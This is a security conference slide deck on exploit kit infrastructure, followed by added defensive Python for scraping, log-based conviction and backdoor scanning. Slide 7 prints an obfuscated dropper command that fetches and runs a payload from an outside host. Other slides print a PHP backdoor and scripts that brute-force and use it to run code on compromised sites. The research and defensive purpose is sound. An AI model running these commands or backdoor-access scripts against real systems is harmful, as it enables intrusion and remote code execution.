Exploit Kit Cornucopia - Blackhat USA 2017
Matt Foley and Brad Antoniewicz - Detecting the compromised websites, gates, and dedicated hosts that make up the infrastructure used by Exploit Kits involves a variety of creative techniques. In this session, we will detail four approaches to uncovering these systems while explaining the underlying architecture of Exploit Kit networks. We will disclose a vulnerability in the injected code placed on compromised websites and exploit that vulnerability to uncover deeper infrastructure. Finally, we'll introduce a novel approach to obtaining the malware sent via phishing campaigns, which is often the same payload that an Exploit Kit compromise delivers.

Note: This presentation contained embedded GIFs that do not animate in this release.

Published in: Internet
  1. Exploit Kit Cornucopia. Brad Antoniewicz, Matt Foley (statements and opinions do not represent the views of, or have been endorsed by, our employer)
  2. © 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential. Speakers: Matt Foley, Intern @ Cisco Umbrella, CS Major @ NYU Tandon. Brad Antoniewicz, Researcher @ Cisco Umbrella, @brad_anton. Image: http://www.zenn.com.sg/Marketplace%20images/Speakers/Tannoy%20Berkeley%20speakers%20(2).JPG
  3. Agenda: Background, Crawling, Amplifying Convictions, Backdoored, Disposable Mailboxes. Image: http://fc06.deviantart.net/fs70/i/2013/248/4/3/bearshark_blueprints_wallpaper_1600x900_by_dangerousdeven-d6l544l.png
  4. (image-only slide)
  5. Pseudo-Darkleech Campaign Using Rig Exploit Kit
  6. Exploit Kit, Script, Ransomware, Trojan, etc...
  7. cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",…….x);j./**/run("cmd"+E+" /c "+x,0)}catch(_x){};q.Deletefile(K);>o32.tmp && start wscript //B //E:JScript o32.tmp "gexywoaxor" "http://free.fabuloussatchi.com/?qtuif=4979&q=[REDACTED]&ct=diamond&oq=[REDACTED]" "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; rv:11.0) like Gecko"
  8. Landing Page Injection. Diagram labels: Compromised Site, Ad Net. Subscriber, Staged Site (Ad), Victim, Malvertising, Compromised Site, RIG Server, Gets lander (proxy), Step 1.
  9. Filtering. Diagram labels: Compromised Site, Ad Net. Subscriber, Staged Site (Ad), RIG Server, Victim, Malvertising, Compromised Site, Gets 'proxy', TDS/Crawler Filtering, TDS: Browser, IP, Region, Time, Step 1.
  10. (image-only slide)
  11. (image-only slide)
  12. Exploit Delivery. Diagram labels: Victim, Step 1, Step 2, Render iframe, Lander, Virtual Dedicated Server (VDS), Gets exploit.
  13. (image-only slide)
  14. Exploit Regurgitation: CVE-2015-8651 (Flash), CVE-2015-0311 (Flash), CVE-2016-4117 (Flash), CVE-2016-0189 (IE), CVE-2015-2419 (IE)
  15. Images: https://www.bleepstatic.com/swr-guides/h/hoeflertext/firefox/HoeflerText-font-missing-firefox.jpg, http://www.malware-traffic-analysis.net/2017/02/22/2017-02-22-EITest-HoeflerText-Chrome-popup-image-04.jpg
  16. ektracker.com. Special thanks to @cyber_attacks, @nao_sec, @ektracker, @executemalware
  17. IP/ASN relationships
  18. Domains/Registrants
  19. Scraping
  20. Scraper V1 Orchestration. Diagram labels: Domains in queue, Worker, Worker.
  21. Scraper V1 Worker. Diagram labels: DOM, Query site twice, then diff DOM/source, Requests source, Filters.
  22. Popularity and Spike. Diagram labels: Google.com, Lander.
  23. Proxy V1: BLOCKED
  24. Scraper V2. Diagram labels: Candidate 1, Candidate 2, Candidate 3, Browser (requests), Browser (requests), EK Decoder Module, Detector Module.
  25. Decoder Module. Lander source and suspected EK passed to decoder. EK Decoder Module: Flash exploits, executables, etc. Decoder parses JS and identifies EK artifacts.
  26. Proxy V2: Rotating IPs, Choice of region, Squid Proxy
  27. Sources for Scraping: ektracker.com, malware-traffic-analysis.net, zerophagemalware.com, broadanalysis.com, malwarebreakdown.com. Credit: @nao_sec (Where to get suspected exploit kit sites)
  28. Amplifying Convictions with Hitlist. Images: https://culturedcode.com/things/iphone/makingof/List-02-Sketch.jpg, https://s-media-cache-ak0.pinimg.com/736x/51/41/b1/5141b1839f3c8484cf510750044366f7.jpg
  29. (image-only slide)
  30. Compromised Site: Unknown. Backend Logs. Gate: Known
  31. Conviction: Amplified! S3 Lambda: if host in eks: s3.put_object(...). Pipeline: Logs, EK List, Candidates, Filter, Convict.
  32. Teamwork makes the dream work. Scraper: Finds Landers, Confirms HitList detections. HitList: Finds compromised sites.
  33. Show graphic of detections! Fancy D3 graph goes here. Gates to compromised sites.
  34. Backdoored
  35. Campaign Orchestration. Diagram labels: Compromised Sites, preg_replace('/12/e',$code,'12'), nav-menu.php backdoor (pseudo-darkleech), Attacker, eval()
  36. Backdoor Obfuscation and 'Security'. nav-menu.php backdoor:
      $_passssword = '0a02419ec68460d4a320c53b680441ff';
      if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
  37. '0a02419ec68460d4a320c53b680441ff'
  38. nav-menu.php backdoor:
      $url = decrypt_url('a3d3czksLDIx………NDkyMzI7MjA0OTEzMjA=');
  39. /blog/?manchester&utm_source=82267:1021107:2013 (userid? flowid?)
  40. /blog/?manchester&utm_source=82267:1021107:2013 (userid? flowid?)
      /blog/?manchester&utm_source=65857:1018137:2013
      /blog/?manchester&utm_source=50426:1022174:2013
      /blog/?manchester&utm_source=77620:1019894:2013
      /blog/?manchester&utm_source=33398:1017062:2013
  41. Backdoor access:
      pw = hashlib.md5('1021107').hexdigest()
      data = { pw: 'preg_match', 'a': '//e', 'c': 'some_php_code' }
      requests.post(compromised_site, data=data)
  42. nginx, Apache. Reasonable, but still good for us. awwwyisssss
  43. Brute Forcing:
      data = { 'a': '//e', 'c': 'some_php_code' }
      for i in range(1010000, 1030000):
          pw = hashlib.md5(str(i)).hexdigest()
          data[pw] = 'preg_match'
          requests.post(compromised_site, data=data)
  44. POST Data
  45. Bypassing Filtering. Diagram labels: Compromised Site, Staged Site (Ad), RIG Server. Request new gates, spoof UserAgent, Source IP, etc..
  46. Reliable EK Server Hosting
  47. Disposable Mailboxes
  48. Not good for research
  49. @brad_anton
  50. MailRunner: Identifying ransomware and commodity malware. Diagram labels: Bait Mailboxes, Block, Dewey Classification Engine, Convict, then pass on email attributes.
  51. Detections (One mailbox): 7.4k Malicious Emails, 15k Unique Domains. @brad_anton
  52. lacedmail.com
  53. Little Things
  54. (image-only slide)
  55. (image-only slide)
  56. Recap: Good for research. Bad guy mistakes :). Amplify convictions. Roll your own scraper/proxy.
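The "Scraper V1 Worker" slide (query the site twice, then diff the DOM/source, then filter) is shown only as a diagram. The following is an added example, not code from the talk or from Cisco Umbrella, that models the double-fetch diff step over raw HTML with the standard library; the two responses, the lander host and the allowlist are constructed placeholders. The point it demonstrates is why one fetch is not enough: a TDS that filters on IP, browser, region or time can serve the injected iframe on one request and a clean page on the next, and the reference that is unstable between fetches is the candidate worth handing to a decoder.

```python
"""Models the Scraper V1 worker step 'query site twice, then diff': fetch
the same candidate page twice and report script/iframe references that
appear in only one response. TDS filtering (IP, browser, region, time) can
make an injected lander show up on one request and not the next, so a
single fetch is not enough. Both responses below are constructed samples."""
from html.parser import HTMLParser

# Constructed first fetch: carries a 1x1 iframe pointing at a placeholder lander host.
FETCH_1 = """<html><head><script src="https://cdn.example/app.js"></script></head>
<body><p>Welcome to the blog</p>
<iframe src="http://lander-constructed.example/?x=1" width="1" height="1"></iframe>
</body></html>"""

# Constructed second fetch: same page, lander iframe gone, one extra first-party script.
FETCH_2 = """<html><head><script src="https://cdn.example/app.js"></script>
<script src="https://cdn.example/ab-test.js"></script></head>
<body><p>Welcome to the blog</p>
</body></html>"""


class RefCollector(HTMLParser):
    """Collects (tag, src) pairs from <script src=...> and <iframe src=...>."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            src = dict(attrs).get("src")
            if src:
                self.refs.append((tag, src))


def collect_refs(html):
    """Parse one response and return its external references as a set."""
    parser = RefCollector()
    parser.feed(html)
    parser.close()
    return set(parser.refs)


def diff_fetches(first, second, allowlist=()):
    """Return references present in exactly one of the two fetches.

    allowlist holds host substrings that are expected to vary legitimately
    (the site's own CDN, analytics) and are dropped before reporting; this
    stands in for the 'Filters' box on the worker diagram.
    """
    changed = collect_refs(first) ^ collect_refs(second)
    return {ref for ref in changed
            if not any(host in ref[1] for host in allowlist)}


if __name__ == "__main__":
    for tag, src in sorted(diff_fetches(FETCH_1, FETCH_2, allowlist=("cdn.example",))):
        print(f"unstable {tag} reference: {src}")
```

The symmetric difference is deliberate: a reference that disappears between fetches is as interesting as one that appears, since the scraper does not know which of the two requests the TDS chose to serve. In practice the allowlist is where the "Popularity and Spike" filtering from the next slide belongs, so that google.com and the site's own CDN never reach the decoder.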
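The "Conviction: Amplified!" slide compresses the hitlist approach into one line of Lambda pseudocode (if host in eks: s3.put_object(...)) and a pipeline of Logs, EK List, Candidates, Filter, Convict. The block below is an added example, not the talk's or Cisco Umbrella's code, that runs that pipeline offline over constructed log lines: a request to a known gate or lander host makes the referring site a candidate compromised site; popular hosts and single-client noise are filtered; what is left is convicted. The log format, the hosts in the EK list and the popularity allowlist are all placeholders, and the S3 write is replaced by a returned mapping.

```python
"""Hitlist-style conviction amplification: known gates/landers (the EK list)
plus backend logs reveal the unknown compromised sites that refer victims
to them. All hosts and log lines below are constructed placeholders."""
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed EK list: gate/lander hosts already convicted by the scraper.
KNOWN_EK_HOSTS = {"gate-known.example", "lander-known.example"}

# Constructed popularity allowlist: never convicted on referer evidence alone.
POPULAR_HOSTS = {"google.com", "www.google.com"}

# Constructed log lines, one request each: timestamp client_ip host path referer
SAMPLE_LOGS = """\
2017-07-26T10:00:01Z 10.0.0.5 gate-known.example /index.php http://blog-victim.example/blog/?manchester
2017-07-26T10:00:03Z 10.0.0.7 gate-known.example /index.php http://blog-victim.example/blog/?manchester
2017-07-26T10:00:09Z 10.0.0.9 lander-known.example /?q=1 http://www.google.com/
2017-07-26T10:01:00Z 10.0.0.5 cdn.benign.example /lib.js http://blog-victim.example/
2017-07-26T10:02:00Z 10.0.0.8 gate-known.example /index.php -
""".splitlines()


def parse_line(line):
    """Split one constructed log line into its five fields."""
    ts, client, host, path, referer = line.split(" ", 4)
    return {"ts": ts, "client": client, "host": host, "path": path, "referer": referer}


def find_candidates(lines, ek_hosts):
    """Logs + EK list -> candidates: map each referring site to the distinct
    clients that were sent from it to a known EK host."""
    clients_by_site = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec["host"] not in ek_hosts or rec["referer"] == "-":
            continue  # not an EK request, or no referer to learn from
        site = urlsplit(rec["referer"]).hostname
        if site:
            clients_by_site[site].add(rec["client"])
    return dict(clients_by_site)


def convict(clients_by_site, popular_hosts, min_clients=2):
    """Filter -> convict: drop popular hosts and one-off noise, return the
    convicted sites with the number of distinct clients behind each."""
    return {site: len(clients) for site, clients in clients_by_site.items()
            if site not in popular_hosts and len(clients) >= min_clients}


if __name__ == "__main__":
    candidates = find_candidates(SAMPLE_LOGS, KNOWN_EK_HOSTS)
    for site, count in convict(candidates, POPULAR_HOSTS).items():
        print(f"convicted compromised site {site} ({count} clients)")
```

The min_clients threshold and the popularity allowlist are the "Filter" step: a single client whose referer is a popular site is far more likely to be a search result or a scraper than an injection. The slide's own Lambda writes each match to S3 instead of returning it; the same two functions would sit in front of that write.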
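The "Backdoored" slides print the nav-menu.php backdoor: a hard-coded 32-hex "password" constant, a call whose function name is read from a request-controlled array key, and the preg_replace() /e trick on the orchestration diagram. From the defender's side the useful thing is to find that injected code on a site before the gate does; the block below is an added example of a static scan for those three traits, not the talk's or Cisco Umbrella's code. The suspect sample is modelled on the snippet printed on the slide (the hash constant is the one shown there); the file paths and the clean sample are constructed.

```python
"""Static check for the nav-menu.php style backdoor from the 'Backdoored'
slides: a hard-coded 32-hex 'password' constant, a function call whose name
comes from a request-controlled array key, and preg_replace() with the /e
(eval) modifier. Sample inputs are constructed; rules are deliberately narrow."""
import re

# Each rule is (name, compiled pattern); widen them for a real code base.
RULES = [
    ("md5_password_constant",
     re.compile(r"\$\w*pass\w*\s*=\s*'[0-9a-f]{32}'")),
    ("request_keyed_dynamic_call",
     re.compile(r"\$\w+\[\$\w+\]\s*\(")),
    ("preg_replace_e_modifier",
     re.compile(r"""preg_replace\s*\(\s*['"]/[^'"]*?/[a-zA-Z]*e[a-zA-Z]*['"]""")),
]

# Constructed suspect file modelled on the slide's snippet.
SUSPECT_PHP = r"""<?php
$_passssword = '0a02419ec68460d4a320c53b680441ff';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c'])
    @$p[$_passssword](@$p['a'], @$p['c'], '');
$code = 'some_php_code';
preg_replace('/12/e', $code, '12');
"""

# Constructed clean file: ordinary preg_replace with a non-/e modifier.
CLEAN_PHP = r"""<?php
$title = 'Menu';
echo preg_replace('/\s+/i', ' ', $title);
"""


def scan_php(source):
    """Return the names of all rules that match the given PHP source."""
    return [name for name, pattern in RULES if pattern.search(source)]


def scan_files(files):
    """Scan a {path: source} mapping and return only the paths with findings."""
    findings = {}
    for path, source in files.items():
        hits = scan_php(source)
        if hits:
            findings[path] = hits
    return findings


if __name__ == "__main__":
    # Paths are placeholders; the slide names only the file nav-menu.php.
    for path, hits in scan_files({"site/nav-menu.php": SUSPECT_PHP,
                                  "site/index.php": CLEAN_PHP}).items():
        print(f"{path}: {', '.join(hits)}")
```

The second rule is the one that generalises beyond this campaign: legitimate PHP rarely calls a function whose name is taken from an array indexed by another variable, so $p[$x](...) is a strong signal on its own. The /e modifier of preg_replace() was deprecated in PHP 5.5 and removed in 7.0, so a hit on the third rule also tells you the site is running an old interpreter.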
